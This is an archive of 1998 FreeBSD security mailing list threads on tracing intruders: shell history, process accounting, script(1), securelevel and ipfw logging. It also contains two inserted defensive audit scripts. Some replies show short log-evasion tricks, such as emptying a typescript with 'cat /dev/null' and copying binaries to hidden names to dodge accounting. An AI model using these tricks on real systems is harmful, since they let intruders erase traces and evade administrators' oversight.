In-Reply-To: <199808280814.BAA07281@burka.rdy.com>

| > | It won't tell you much. Not in its current state. It would be a good idea
| > | to extend acct to log everything, including program switches and (possibly)
| > | some stuff from the environment. Also it would be a good idea to be able
| > | to log information on per-user basis.
| >
| > Could we not modify the [kernel] to log all activity on the ttyp's to
| > a file?
|
| Yeah. You'll need to modify telnetd/rlogind/sshd/etc to do it.

Hmm.. when I said 'we' I didn't actually mean me included ;)

Regards,

Jay Tribick
--
[| Network Administrator | FastNet International | http://fast.net.uk/ |]
[| Finger netadmin@fastnet.co.uk for contact information |]
[| T: +44 (0)1273 677633 F: +44 (0)1273 621631 e: netadmin@fast.net.uk |]

From owner-freebsd-security Fri Aug 28 03:23:57 1998
From: Darren Reed
Date: Fri, 28 Aug 1998 20:22:39 +1000 (EST)
To: netadmin@fastnet.co.uk (Jay Tribick)
Cc: security@FreeBSD.ORG
Subject: Re: Shell history
Message-Id: <199808281023.DAA28353@hub.freebsd.org>

In some mail from Jay Tribick, sie said:
>
> | > > What if the user would be to switch shell or to install their own?
> | > > I do not think one should depend on shell history to log all what
> | > > user does. How would YOU monitor what your users are
> | > > doing if you had to?
> | >
> | > accton(8), lastcomm(1)
> |
> | It won't tell you much. Not in its current state. It would be a good idea
> | to extend acct to log everything, including program switches and (possibly)
> | some stuff from the environment. Also it would be a good idea to be able
> | to log information on per-user basis.
>
> Could we not modify the [kernel] to log all activity on the ttyp's to
> a file?

If Julian Assange is around, I think he did something like that for Linux
which may be portable to Unix.

Darren

From owner-freebsd-security Fri Aug 28 06:22:55 1998
From: Andrew McNaughton
Reply-To: andrew@squiz.co.nz
Date: Sat, 29 Aug 1998 01:20:08 +1200 (NZST)
To: Brendan Kosowski
Cc: FreeBSD Security
Subject: Re: FreeBSD 2.2.5 Security Problem

On Thu, 27 Aug 1998, Brendan Kosowski wrote:

> I suspect a regular security break-in on my FreeBSD 2.2.5 system for the
> following reasons :
>
>
> ( Note1 : my system has a small number of users which I know well )
> ( Note2 : my inetd.conf only enables FTPD, TELNETD & POPPER )

Popper looks like your problem. You probably know that by now, but your
problem doesn't end there.

> 1. My Internet costs increased by 10 times last month.

If you know which ip's or subnets all of your legitimate users will be
connecting from, you can set up rules with ipfw to log all packets from
outside those areas, or to ports you don't expect to be used. If the number
of incoming connections is small, you could just set up a single rule:

    ipfw add allow log tcp from any to ${your_ip} setup

It won't catch udp traffic etc, but chances are it will be enough to find out
where your hacker is coming from. Better still set ipfw up to block and log
all but the minimum range of traffic you can get away with in order to provide
normal service.

There is a danger of letting your hacker know you're onto them before you cut
them out because a scared hacker who wants to cover all traces of their access
may try to delete stuff rather indiscriminately.

> 2. I often see 2 SHELLS running when I do a "ps -ax" even though I am the
> only person listed when I do a "who".

Who will only list shells under particular circumstances, and in particular
it won't list the non-interactive shells which get spawned by lots of system
and other processes. I'd be suspicious of shells which persist (same pid)
over time, or perhaps where there are other reasons to suspect foul play.
Seems like you probably have those. There are ways to avoid appearing in
'who'.

> 3. My SYSLOG messages file has lots of telnetd "undefined errors" during
> times when NO ONE is using the system.

Very suspicious.

> Does anyone have AN OFFICIAL LIST OF FreeBSD 2.2.5 SECURITY HOLES and
> HOW TO FIX THEM ???

I hope not. Known holes should be plugged, not listed. To find out about
current problems though, search the archives of the freebsd security lists,
and the bugtraq archives at www.geek-girl.com.

If you have system accounting turned on, you might want to try "sa -u".
Otherwise, turning it on (in rc.conf) might be useful for figuring out what
they're doing.

Also check for stuff in history files in home directories.

When you think you have your hacker online, you might use things like 'watch'
(hrmm, probably not using a tty if they're not in 'who'), 'lsof', 'ktrace'.

'last' can be used to look at login times and where the login was from.

From owner-freebsd-security Fri Aug 28 08:07:16 1998
From: Sean Kelly
Organization: Pluto Technologies
Date: Fri, 28 Aug 1998 09:06:09 -0600
To: Joe Gleason
Cc: "Jan B. Koum", security@FreeBSD.ORG
Subject: Re: Shell history (Was: Re: post breakin log)
Message-ID: <35E6C761.BF4CEAA2@plutotech.com>
References: <002001bdd242$f1e3baf0$f10408d1@bug.tasam.com>

> I don't know that much kernel stuff, but what if you hacked the kernel so
> that whatever syscall opens/forks a new process will log the process name
> and parameters?

Set

	accounting_enable="YES"

in /etc/rc.conf.
--Sean

From owner-freebsd-security Fri Aug 28 11:36:10 1998
From: Adam McDougall
Date: Fri, 28 Aug 1998 14:35:03 -0400
To: security@FreeBSD.ORG
Subject: Re: Shell history (Was: Re: post breakin log)
Message-ID: <35E6F857.1E8A4101@ameritech.net>

Jan B. Koum wrote:
>
> What if the user would be to switch shell or to install their own?
>
> I do not think one should depend on shell history to log all what
> user does. Best way to implement something like watch(8) to check
> the ttys you want or to automatically start when someone attaches
> to a tty. Again, this is also flawed.. what if someone simply

If you are that interested about what a particular user is doing on your
system, should they even have an account? :)

You could plop a script(1) command in their .cshrc or maybe in the
system cshrc, etc if user=soandso

    SCRIPT(1)               FreeBSD General Commands Manual               SCRIPT(1)

    NAME
         script - make typescript of terminal session

From owner-freebsd-security Fri Aug 28 12:11:45 1998
From: john
Date: Fri, 28 Aug 1998 14:08:07 -0500 (CDT)
To: kelly@plutotech.com (Sean Kelly)
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: accounting.
Message-Id: <199808281908.OAA16685@leonardo.cascss.unt.edu>
In-Reply-To: <35E6C761.BF4CEAA2@plutotech.com> from Sean Kelly at "Aug 28, 98 09:06:09 am"

> Set
>
> 	accounting_enable="YES"
>
> in /etc/rc.conf.

But this doesn't seem to log the switches used for the program, or am I
missing a switch. I have accounting enabled and when I went to use it the
information in the accounting db didn't have command-line info.
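Andrew McNaughton's advice earlier in this thread, to log with ipfw and look for sources your legitimate users never connect from, leaves open how to read the resulting syslog lines once the rule has been logging for a day. The script below is an added example written for this thread, not code from the list or from FreeBSD. It assumes the classic ipfw log line layout "ipfw: <rule> <action> <proto> <src>:<port> <dst>:<port> in via <if>" (an assumption about the format, not stated in the thread) and feeds itself constructed sample lines in place of /var/log/security; the trusted-prefix list is a plain dotted-string prefix match, which is enough for whole /24 or /16 networks.

```shell
#!/bin/sh
# Added example: summarise ipfw "log" hits from syslog so that connection
# attempts from outside the networks legitimate users come from stand out.
# Assumed log layout (not from the thread):
#   ... ipfw: <rule> <action> <proto> <src>:<sport> <dst>:<dport> in via <if>

# Constructed sample syslog lines, standing in for /var/log/security.
SAMPLE_LOG='Aug 28 02:14:07 gw /kernel: ipfw: 100 Accept TCP 192.0.2.10:1027 192.0.2.3:110 in via ed0
Aug 28 02:14:09 gw /kernel: ipfw: 100 Accept TCP 192.0.2.10:1028 192.0.2.3:23 in via ed0
Aug 28 03:41:22 gw /kernel: ipfw: 100 Accept TCP 198.51.100.77:4021 192.0.2.3:110 in via ed0
Aug 28 03:41:40 gw /kernel: ipfw: 100 Accept TCP 198.51.100.77:4022 192.0.2.3:110 in via ed0
Aug 28 03:42:01 gw /kernel: ipfw: 100 Accept TCP 198.51.100.77:4023 192.0.2.3:23 in via ed0
Aug 28 09:05:12 gw /kernel: ipfw: 100 Accept TCP 203.0.113.5:2049 192.0.2.3:21 in via ed0
Aug 28 09:05:13 gw sendmail[123]: unrelated line that must be ignored'

# ipfw_pairs: read syslog on stdin, print "<source-host> <dest-port>" for
# every ipfw log line; lines without an "ipfw:" token are skipped.
ipfw_pairs() {
    awk '
        {
            for (i = 1; i <= NF; i++) if ($i == "ipfw:") break
            if (i > NF) next                 # not an ipfw line
            split($(i + 4), s, ":")          # src:sport
            split($(i + 5), d, ":")          # dst:dport
            print s[1], d[2]
        }'
}

# ipfw_top_sources: attempts per source host, most active first.
# Output lines: "<count> <source>"
ipfw_top_sources() {
    ipfw_pairs | awk '{ n[$1]++ } END { for (h in n) print n[h], h }' | sort -rn
}

# ipfw_untrusted TRUSTED: sources whose address does not start with one of
# the space-separated prefixes in TRUSTED (e.g. "192.0.2. 10.1."), with the
# number of attempts and the destination ports touched, in first-seen order.
# Output lines: "<source> <count> <port,port,...>"
ipfw_untrusted() {
    ipfw_pairs | awk -v trusted="$1" '
        BEGIN { n = split(trusted, t, " ") }
        {
            ok = 0
            for (i = 1; i <= n; i++) if (index($1, t[i]) == 1) ok = 1
            if (ok) next
            cnt[$1]++
            if (!seen[$1, $2]++) {
                if (ports[$1] == "") ports[$1] = $2
                else ports[$1] = ports[$1] "," $2
            }
        }
        END { for (h in cnt) print h, cnt[h], ports[h] }' | sort
}

echo "--- attempts per source ---"
printf '%s\n' "$SAMPLE_LOG" | ipfw_top_sources
echo "--- sources outside 192.0.2.0/24 ---"
printf '%s\n' "$SAMPLE_LOG" | ipfw_untrusted "192.0.2."
```

On a real gateway replace the sample with `grep ipfw: /var/log/security | ipfw_untrusted "192.0.2. 10.1."`; a source that appears with a high count against the POP port at hours when nobody is logged in is the pattern Andrew describes.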
From owner-freebsd-security Fri Aug 28 13:01:09 1998
From: Jamie Lawrence
Date: Fri, 28 Aug 1998 12:57:14 -0700
To: Brett Glass, "Gregory P. Smith", security@FreeBSD.ORG
Subject: Re: SSH port
Message-Id: <3.0.5.32.19980828125714.00bd8bc0@204.74.82.151>
In-Reply-To: <199808280025.SAA18015@lariat.lariat.org>
References: <199808280021.RAA03533@ryouko.nas.nasa.gov>

This is mostly all out-of-proportion marketing hype of a modest, but
decent, system. Hardly a general purpose advance. There was a discussion of
this on Coderpunks recently. Archives for details.

-j

At 06:24 PM 8/27/98 -0600, Brett Glass wrote:
>Sure. See
>
>http://www.research.ibm.com/news/detail/encryption.html
>
>There's an overview and a link to the paper.
>
>--Brett
>
>
>At 05:21 PM 8/27/98 -0700, Gregory P. Smith wrote:
>
>>
>>> It may be time for a new rev of SSH anyway. IBM's recently announced
>>> method of shutting down known ciphertext "man in the middle" attacks
>>> is worth adding to the protocol.
>>
>>Care to elaborate on this one (ie: a reference to the announcement or
>>an explanation?). (cc' the list as others are bound to ask the same
>>question :)
>>
>>Thanks,
>>Greg
>>

From owner-freebsd-security Fri Aug 28 13:41:10 1998
From: Sean Kelly
Organization: Pluto Technologies
Date: Fri, 28 Aug 1998 14:40:07 -0600
To: john
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: accounting.
Message-ID: <35E715A7.34C01A22@plutotech.com>
References: <199808281908.OAA16685@leonardo.cascss.unt.edu>

> > 	accounting_enable="YES"
> But this doesn't seem to log the switches used for the program

Yep ... that'd be a good feature!

--Sean

From owner-freebsd-security Fri Aug 28 14:05:15 1998
From: john
Date: Fri, 28 Aug 1998 16:01:28 -0500 (CDT)
To: mcdougall@ameritech.net (Adam McDougall)
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Shell history (Was: Re: post breakin log)
Message-Id: <199808282101.QAA19029@leonardo.cascss.unt.edu>
In-Reply-To: <35E6F857.1E8A4101@ameritech.net> from Adam McDougall at "Aug 28, 98 02:35:03 pm"

> Jan B. Koum wrote:
> >
> > What if the user would be to switch shell or to install their own?
> >
> > I do not think one should depend on shell history to log all what
> > user does. Best way to implement something like watch(8) to check
> > the ttys you want or to automatically start when someone attaches
> > to a tty. Again, this is also flawed.. what if someone simply

> If you are that interested about what a particular user is doing on your
> system, should they even have an account? :)

If an account is compromised then it's nice to have a nice concise log of
what occurred.

From owner-freebsd-security Fri Aug 28 15:12:17 1998
From: "Jan B. Koum"
Date: Fri, 28 Aug 1998 15:11:19 -0700 (PDT)
To: security@FreeBSD.ORG
Subject: Re: Shell history (Was: Re: post breakin log)
In-Reply-To: <199808280820.KAA00469@CoDe.hu>

cat /dev/null > typescript

--
Yan

www.best.com/~jkb/
Unix users of the world unite:
www.{free,open,net}bsd.org | www.linux.org | www.apache.org | www.perl.com
"Turn up the lights, I don't want to go home in the dark."

On Fri, 28 Aug 1998, Zahemszky Gabor wrote:

>>
>> This is assuming intruder will not try to change shell, turn off
>> history within the shell and is in general pretty clueless when it comes
>> to shell history. :)
>> A friend of mine came up with an idea to create a shell which
>> would log everything a user does.. not via shell history mechanism, but
>> rather ala watch(8). Everything user types would go into some files
>> somewhere. Then again, nothing ever came out of it.
>
>man script
>
>ZGabor at CoDe dot HU
>

From owner-freebsd-security Fri Aug 28 15:16:25 1998
From: "Jan B. Koum"
Date: Fri, 28 Aug 1998 15:15:18 -0700 (PDT)
To: Zahemszky Gabor
Cc: security@FreeBSD.ORG
Subject: Re: post breakin log
In-Reply-To: <199808280832.KAA00493@CoDe.hu>

In 3.0 you can do so within /etc/rc.conf:

    kern_securelevel_enable="NO"    # kernel security level (see init(8)),
    kern_securelevel="-1"           # range: -1..2 ; `-1' is the most insecure

Which in turn sets this in the very end of /etc/rc:

    % tail -10 rc

    # Raise kernel security level.  This should be done only after `fsck' has
    # repaired local file systems if you want the securelevel to be greater than 1.
    if [ "X${kern_securelevel_enable}" != X"NO" -a "${kern_securelevel}" -ge 0 ]; then
            echo 'Raising kernel security level'
            sysctl -w kern.securelevel=${kern_securelevel}
    fi

    date
    exit 0
    %

--
Yan

www.best.com/~jkb/
Unix users of the world unite:
www.{free,open,net}bsd.org | www.linux.org | www.apache.org | www.perl.com
"Turn up the lights, I don't want to go home in the dark."

On Fri, 28 Aug 1998, Zahemszky Gabor wrote:

>> Brian Behlendorf wrote in message ID
>> <19980827182323.6798.qmail@hyperreal.org>:
>> > Is there a fool-proof way to get user histories like this?  I got one once
>> > only because the cracker was lame enough to forget to delete his
>> > .bash_history file.  Presuming root isn't compromised of course...
>>
>> Force the history files to be created with uappend flag set and run with a non
>> zero security level.
>
>Please!  What is the correct way to change security-level?  Where can I do it?
>Yes, I know that in rc*, but which?  And where?
>
>ZGabor at CoDe dot HU
>

From owner-freebsd-security Fri Aug 28 15:37:29 1998
From: "Jan B. Koum"
Date: Fri, 28 Aug 1998 15:36:29 -0700 (PDT)
To: Adam McDougall
Cc: security@FreeBSD.ORG
Subject: Re: Shell history (Was: Re: post breakin log)
In-Reply-To: <35E6F857.1E8A4101@ameritech.net>

On Fri, 28 Aug 1998, Adam McDougall wrote:

>Jan B. Koum wrote:
>>
>> What if the user would be to switch shell or to install their own?
>>
>> I do not think one should depend on shell history to log all what
>> user does. Best way to implement something like watch(8) to check
>> the ttys you want or to automatically start when someone attaches
>> to a tty. Again, this is also flawed.. what if someone simply
>
>
>If you are that interested about what a particular user is doing on your
>system, should they even have an account? :)

I am not. I don't even have systems on which users have an account.
This discussion arose from the "how do we track back what intruders did on
our system" type discussion. :)

>
>You could plop a script(1) command in their .cshrc or maybe in the
>system cshrc, etc if user=soandso
>
>SCRIPT(1)               FreeBSD General Commands Manual               SCRIPT(1)
>
>NAME
>     script - make typescript of terminal session

cat /dev/null > typescript

Ok, so you have $HOME/typescript append only through chflags. But:

    DESCRIPTION
         Script makes a typescript of everything printed on your terminal.  It is
         useful for students who need a hardcopy record of an interactive session
         as proof of an assignment, as the typescript file can be printed out
         later with lpr(1).

This software was not designed with security in mind, hence...

--
Yan

From owner-freebsd-security Fri Aug 28 15:46:40 1998
From: "Scott I. Remick"
Date: Fri, 28 Aug 1998 18:45:40 -0400
To: freebsd-security@FreeBSD.ORG
Subject: What might use these ports?
Message-Id: <199808282245.SAA08761@server.computeralt.com>

For the sake of something else to discuss... :)

Is there anything legit that might use the following ports?

513, 514, 111

513 is listed in /etc/services as used by "remote login a la telnet" as
well as whod. It says 514 is used by the shell.

111 is....

    sunrpc          111/tcp    rpcbind         #SUN Remote Procedure Call

So are 513 and 514 for real? How are they legitimately used? And what (in
a normal install) might use 111???

Thanks a bunch.

-----------------------
Scott I. Remick                    mailto:scott@computeralt.com
Network and Information Systems    (802)388-7545 FAX:(802)388-3697
Computer Alternatives, Inc.        http://www.computeralt.com

Theater is life.  Television is furniture.

From owner-freebsd-security Fri Aug 28 16:13:15 1998
From: Garrett Wollman
Date: Fri, 28 Aug 1998 19:12:10 -0400 (EDT)
To: "Scott I. Remick"
Cc: freebsd-security@FreeBSD.ORG
Subject: What might use these ports?
Message-Id: <199808282312.TAA14927@khavrinen.lcs.mit.edu>
In-Reply-To: <199808282245.SAA08761@server.computeralt.com>
References: <199808282245.SAA08761@server.computeralt.com>

< said:

> For the sake of something else to discuss... :)
> Is there anything legit that might use the following ports?
> 513, 514, 111

rlogin, rsh, and ONC RPC's portmapper, respectively.

-GAWollman

--
Garrett A. Wollman   | O Siem / We are all family / O Siem / We're all the same
wollman@lcs.mit.edu  | O Siem / The fires of freedom
Opinions not those of| Dance in the burning flame
MIT, LCS, CRS, or NSA|                   - Susan Aglukark and Chad Irschick

From owner-freebsd-security Fri Aug 28 16:55:58 1998
From: "Jan B. Koum"
Date: Fri, 28 Aug 1998 16:54:59 -0700 (PDT)
To: "Scott I. Remick"
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: What might use these ports?
In-Reply-To: <199808282245.SAA08761@server.computeralt.com>

On Fri, 28 Aug 1998, Scott I. Remick wrote:

>For the sake of something else to discuss...
:)
>
>Is there anything legit that might use the following ports?
>
>513, 514, 111
>
>513 is listed in /etc/services as used by "remote login a la telnet" as
>well as whod. It says 514 is used by the shell.
>
>111 is....
>
>sunrpc          111/tcp    rpcbind         #SUN Remote Procedure Call
>
>So are 513 and 514 for real? How are they legitimately used? And what (in
>a normal install) might use 111???

Yes, ports 513 and 514 are for real. However you should try to avoid using
rshell and rlogin protocols (which need those ports) and instead use SSH
(ftp://ftp.funet.fi/pub/unix/security/login/ssh).

How are they legitimately used? You mean, which programs? Uhm.. "man rlogin rsh"

As for 111 - this is used by portmappers. You should turn it off if you
don't have a need for it. Edit /etc/rc.conf to do so. What programs might
use portmapper? The ones which make RPC calls. I personally have not yet had
a need for RPC on my system. Solaris on the other hand.. well.. another story:

    % rpcinfo -p ***.sjsu.edu
       program vers proto   port
        100000    4   tcp    111  portmapper
        100000    3   tcp    111  portmapper
        100000    2   tcp    111  portmapper
        100000    4   udp    111  portmapper
        100000    3   udp    111  portmapper
        100000    2   udp    111  portmapper
        100024    1   udp  32783  status
        100024    1   tcp  32778  status
        100021    1   udp   4045  nlockmgr
        100021    2   udp   4045  nlockmgr
        100021    3   udp   4045  nlockmgr
        100021    4   udp   4045  nlockmgr
        100011    1   udp  32788  rquotad
        100002    2   udp  32789  rusersd
        100002    3   udp  32789  rusersd
        100002    2   tcp  32779  rusersd
        100002    3   tcp  32779  rusersd
        100012    1   udp  32790  sprayd
        100008    1   udp  32791  walld
        100001    2   udp  32792  rstatd
        100001    3   udp  32792  rstatd
        100001    4   udp  32792  rstatd
        100083    1   tcp  32785  ttdbserver
        100021    1   tcp   4045  nlockmgr
        100021    2   tcp   4045  nlockmgr
        100021    3   tcp   4045  nlockmgr
        100021    4   tcp   4045  nlockmgr
        100003    2   tcp   2049  nfs
        100003    3   tcp   2049  nfs
        100026    1   udp  32843  bootparamd
        100026    1   tcp  32924  bootparamd
    [2 pages of other crap sniped]

>
>Thanks a bunch.

Wasn't sure what you were asking. Does the above help?

--
Yan

>-----------------------
>Scott I. Remick                    mailto:scott@computeralt.com
>Network and Information Systems    (802)388-7545 FAX:(802)388-3697
>Computer Alternatives, Inc.        http://www.computeralt.com
>
>Theater is life.  Television is furniture.
>

From owner-freebsd-security Fri Aug 28 16:58:25 1998
From: Darren Reed
Date: Sat, 29 Aug 1998 09:56:27 +1000 (EST)
To: kelly@plutotech.com (Sean Kelly)
Cc: clash@tasam.com, jkb@best.com, security@FreeBSD.ORG
Subject: Re: Shell history (Was: Re: post breakin log)
Message-Id: <199808282358.QAA12438@hub.freebsd.org>
In-Reply-To: <35E6C761.BF4CEAA2@plutotech.com> from "Sean Kelly" at Aug 28, 98 09:06:09 am

In some mail from Sean Kelly, sie said:
>
> > I don't know that much kernel stuff, but what if you hacked the kernel so
> > that whatever syscall opens/forks a new process will log the process name
> > and parameters?
>
> Set
>
> 	accounting_enable="YES"
>
> in /etc/rc.conf.

doesn't record command line options and truncates the executable's name at 8
bytes.
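Jan Koum's two replies above point at /etc/rc.conf both for the securelevel knobs and for turning portmap off, and at inetd.conf for the r-services behind ports 513 and 514. The script below is an added example, not code from the thread or from FreeBSD, that reads both files and reports what they would actually enable at boot: which r-services inetd would start, whether portmap is on, and whether the securelevel settings pass the same test as the /etc/rc fragment quoted earlier (enable not "NO" and level >= 0). It assumes the knob names kern_securelevel_enable, kern_securelevel and accounting_enable as quoted in the thread, portmap_enable as the rc.conf knob of that era (my assumption), and inetd.conf's standard service/socket/protocol column layout; the sample file contents are constructed and written to a temporary directory so the script runs anywhere.

```shell
#!/bin/sh
# Added example: read-only audit of rc.conf and inetd.conf for the settings
# discussed in the thread (r-services, portmap, securelevel). On a real host
# set RC_CONF=/etc/rc.conf and INETD_CONF=/etc/inetd.conf instead of the
# constructed samples below.

TMPDIR_AUDIT=$(mktemp -d)
RC_CONF="$TMPDIR_AUDIT/rc.conf"
INETD_CONF="$TMPDIR_AUDIT/inetd.conf"
trap 'rm -rf "$TMPDIR_AUDIT"' EXIT

# Constructed sample rc.conf, mirroring the settings quoted in the thread.
cat > "$RC_CONF" <<'EOF'
portmap_enable="YES"
accounting_enable="YES"
kern_securelevel_enable="NO"   # kernel security level (see init(8))
kern_securelevel="-1"          # range: -1..2 ; -1 is the most insecure
EOF

# Constructed sample inetd.conf: only the lines relevant here.
cat > "$INETD_CONF" <<'EOF'
ftp     stream  tcp  nowait  root  /usr/libexec/ftpd     ftpd -l
telnet  stream  tcp  nowait  root  /usr/libexec/telnetd  telnetd
#shell  stream  tcp  nowait  root  /usr/libexec/rshd     rshd
login   stream  tcp  nowait  root  /usr/libexec/rlogind  rlogind
pop3    stream  tcp  nowait  root  /usr/local/libexec/popper popper
EOF

# rc_value FILE KEY: value of KEY="..." in an rc.conf-style file. The last
# assignment wins; trailing comments and quotes are stripped; empty if unset.
rc_value() {
    awk -v key="$2" '
        $0 ~ ("^[ \t]*" key "=") {
            v = $0
            sub("^[ \t]*" key "=", "", v)
            sub("[ \t]*#.*$", "", v)          # trailing comment
            gsub(/"/, "", v)                  # surrounding quotes
            gsub(/^[ \t]+|[ \t]+$/, "", v)
            val = v
        }
        END { print val }' "$1"
}

# inetd_rservices FILE: enabled inetd entries for the r-protocols, with the
# well-known port each one listens on (exec=512, login=513, shell=514).
# Commented-out entries are not reported. Output lines: "<service> <port>"
inetd_rservices() {
    awk '
        /^[ \t]*#/ || NF == 0 { next }
        $1 == "exec"  { print $1, 512 }
        $1 == "login" { print $1, 513 }
        $1 == "shell" { print $1, 514 }' "$1"
}

# portmap_status FILE: "on" if portmap_enable is YES (any case), else "off".
portmap_status() {
    case "$(rc_value "$1" portmap_enable)" in
        [Yy][Ee][Ss]) echo on ;;
        *)            echo off ;;
    esac
}

# securelevel_at_boot FILE: the level /etc/rc would set, applying the same
# test as the quoted fragment, or "unchanged" when the fragment is skipped
# (enable set to NO, or level below 0).
securelevel_at_boot() {
    enable=$(rc_value "$1" kern_securelevel_enable)
    level=$(rc_value "$1" kern_securelevel)
    if [ "X$enable" != "XNO" ] && [ "${level:--1}" -ge 0 ]; then
        echo "$level"
    else
        echo unchanged
    fi
}

echo "r-services enabled in inetd.conf:"
inetd_rservices "$INETD_CONF"
echo "portmap (port 111): $(portmap_status "$RC_CONF")"
echo "process accounting: $(rc_value "$RC_CONF" accounting_enable)"
echo "securelevel set at boot: $(securelevel_at_boot "$RC_CONF")"
```

With the constructed samples the report shows rlogind still enabled, portmap on, and the securelevel left untouched at boot, which is exactly the combination the thread warns about: append-only history files and typescripts only hold if the securelevel actually gets raised.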
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 28 22:07:08 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id WAA10955 for freebsd-security-outgoing; Fri, 28 Aug 1998 22:07:08 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from peak.mountin.net (peak.mountin.net [207.227.119.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id WAA10950 for ; Fri, 28 Aug 1998 22:07:04 -0700 (PDT) (envelope-from jeff-ml@mountin.net) Received: (from daemon@localhost) by peak.mountin.net (8.9.1/8.9.1) id AAA02294; Sat, 29 Aug 1998 00:05:41 -0500 (CDT) Received: from aridius-108.isdn.mke.execpc.com(169.207.66.235) by peak.mountin.net via smap (V1.3) id sma002292; Sat Aug 29 00:05:19 1998 Message-Id: <3.0.3.32.19980828235925.00b1b5ec@207.227.119.2> X-Sender: jeff-ml@207.227.119.2 X-Mailer: QUALCOMM Windows Eudora Pro Version 3.0.3 (32) Date: Fri, 28 Aug 1998 23:59:25 -0500 To: "Jan B. Koum " From: "Jeffrey J. Mountin" Subject: Re: Shell history Cc: security@FreeBSD.ORG In-Reply-To: References: <199808280519.PAA04932@henry.cs.adfa.oz.au> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 11:05 PM 8/27/98 -0700, Jan B. Koum wrote: >On Fri, 28 Aug 1998, Warren Toomey wrote: > >>In article by Jan B. Koum: >>> What if the user would be to switch shell or to install their own? >>> I do not think one should depend on shell history to log all what >>> user does. How would YOU monitor what your users are >>> doing if you had to? >> >> accton(8), lastcomm(1) >> >> Warren >> > > Once can just "cp" the executable. But in order to 'cp' you must be able to read. Why have more permissions than needed? 
Jeff Mountin - Unix Systems TCP/IP networking
jeff@mountin.net

From owner-freebsd-security Fri Aug 28 22:12:02 1998
From: "Jan B. Koum"
Date: Fri, 28 Aug 1998 22:10:53 -0700 (PDT)
To: "Jeffrey J. Mountin"
Cc: security@FreeBSD.ORG
Subject: Re: Shell history
In-Reply-To: <3.0.3.32.19980828235925.00b1b5ec@207.227.119.2>

On Fri, 28 Aug 1998, Jeffrey J. Mountin wrote:

>At 11:05 PM 8/27/98 -0700, Jan B. Koum wrote:
>>On Fri, 28 Aug 1998, Warren Toomey wrote:
>>
>>>In article by Jan B. Koum:
>>>> What if the user would be to switch shell or to install their own?
>>>> I do not think one should depend on shell history to log all what
>>>> user does. How would YOU monitor what your users are
>>>> doing if you had to?
>>>
>>> accton(8), lastcomm(1)
>>>
>>> Warren
>>>
>>
>> One can just "cp" the executable.
>
>But in order to 'cp' you must be able to read.
>
>Why have more permissions than needed?
>
>Jeff Mountin - Unix Systems TCP/IP networking
>jeff@mountin.net

Uhm.. I don't have to read. If I want to execute something and it is in my
path, I just "cp `which vi` ./..." and then "./..."

Taking away read permissions from directories such as /bin, /sbin and etc.
is just security through obscurity IMHO unless you are doing some other
things such as trusted path execution, chroot'ed environment, etc.

-- Yan

From owner-freebsd-security Fri Aug 28 22:37:28 1998
From: scex
Date: Fri, 28 Aug 1998 22:30:44 -0700 (PDT)
To: "Jan B. Koum"
Cc: "Jeffrey J. Mountin", security@FreeBSD.ORG
Subject: Re: Shell history

> >> One can just "cp" the executable.
> >But in order to 'cp' you must be able to read.
> >Why have more permissions than needed?
> Uhm.. I don't have to read. If I want to execute something and it
> is in my path, I just "cp `which vi` ./..." and then "./..."
> Taking away read permissions from directories such as /bin, /sbin
> and etc. is just security through obscurity IMHO unless you are doing some
> other things such as trusted path execution, chroot'ed environment, etc.

[scex@twist] [~]$ cd bin
[scex@twist] [bin]$ ll bash
-rwx------  1 scex  users  - 389120 Aug 20 03:31 bash*
[scex@twist] [bin]$ chmod 711 bash
[scex@twist] [bin]$ ll bash
-rwx--x--x  1 scex  users  - 389120 Aug 20 03:31 bash*
[scex@twist] [bin]$ su nobody
Password:
[nobody@twist] [bin]$ cp bash /tmp/...
cp: bash: permission denied

no-one's talking about taking away read permissions from directories
(although that also has its applications); you have to have read
permission on a file to be able to copy it (unless you fancy mucking
around in /proc & streams).

scex

From owner-freebsd-security Fri Aug 28 22:44:00 1998
From: "Jan B. Koum"
Date: Fri, 28 Aug 1998 22:42:52 -0700 (PDT)
To: scex
Cc: "Jeffrey J. Mountin", security@FreeBSD.ORG
Subject: Re: Shell history

On Fri, 28 Aug 1998, scex wrote:

>> >> One can just "cp" the executable.
>> >But in order to 'cp' you must be able to read.
>> >Why have more permissions than needed?
>> Uhm.. I don't have to read. If I want to execute something and it
>> is in my path, I just "cp `which vi` ./..." and then "./..."
>> Taking away read permissions from directories such as /bin, /sbin
>> and etc. is just security through obscurity IMHO unless you are doing some
>> other things such as trusted path execution, chroot'ed environment, etc.
>
>[scex@twist] [~]$ cd bin
>[scex@twist] [bin]$ ll bash
>-rwx------  1 scex  users  - 389120 Aug 20 03:31 bash*
>[scex@twist] [bin]$ chmod 711 bash
>[scex@twist] [bin]$ ll bash
>-rwx--x--x  1 scex  users  - 389120 Aug 20 03:31 bash*
>[scex@twist] [bin]$ su nobody
>Password:
>[nobody@twist] [bin]$ cp bash /tmp/...
>cp: bash: permission denied
>
>no-one's talking about taking away read permissions from directories
>(although that also has its applications); you have to have read
>permission on a file to be able to copy it (unless you fancy mucking
>around in /proc & streams).
>
>scex

Hmm.. you are right, but what will stop an attacker who has freebsd box or
has access to one to download the binary?

-- Yan

From owner-freebsd-security Fri Aug 28 23:23:56 1998
From: "Matthew D. Fuller"
Date: Sat, 29 Aug 1998 01:22:45 -0500
To: "Jan B. Koum"
Cc: scex, "Jeffrey J. Mountin", security@FreeBSD.ORG
Subject: Re: Shell history
Message-ID: <19980829012245.54585@futuresouth.com>
In-Reply-To: from Jan B. Koum on Fri, Aug 28, 1998 at 10:42:52PM -0700

On Fri, Aug 28, 1998 at 10:42:52PM -0700, Jan B. Koum woke me up to tell me:
> Hmm.. you are right, but what will stop an attacker who has
> freebsd box or has access to one to download the binary?

mount -u -o noexec /home?
(and /tmp, of course)

*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
| FreeBSD; the way computers were meant to be              |
